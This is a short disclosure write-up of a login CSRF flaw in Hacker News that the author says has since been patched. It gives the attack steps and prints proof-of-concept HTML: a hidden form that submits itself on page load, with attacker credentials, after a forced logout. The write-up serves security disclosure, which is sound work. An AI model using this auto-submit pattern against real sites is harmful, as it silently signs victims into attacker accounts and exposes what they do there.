On February 17th, I discovered a session riding vulnerability on the login and logout forms of Hacker News. The attack was a cross site request forgery (CSRF), triggered by clicking an article posted by the attacker.
When we think of malicious hackers, we often imagine them trying to log into accounts they don’t own. But the reverse approach - forcing legitimate users to log into an attacker’s account without realizing it - can be just as harmful.
The attack worked like this:
- Attacker submits a title like “CSRF And You (2008)” with a URL that points to the exploit code.
- User clicks on interesting article.
- User is logged out of account, silently logged into an attacker-controlled account, and sent to the comments section.
- User reads comments section for interesting article.
- User does other, more sensitive actions in the attacker-controlled account (apply for YC? change email? add credit card? make brilliant karma-rich submission?).
The exploit code looked like this:
<body onload="document.getElementById('csrf_demo').submit()" style="display:none;"> <img src="https://news.ycombinator.com/logout" /> <form id="csrf_demo" action="https://news.ycombinator.com/login" method="post"> <input name="goto" value="item?id=11122018"> <input name="acct" value="csrf"> <input name="pw" value="password"> </form> </body>
I contacted Dan at Hacker News and the team immediately patched the vulnerabilities. This attack no longer works as described above.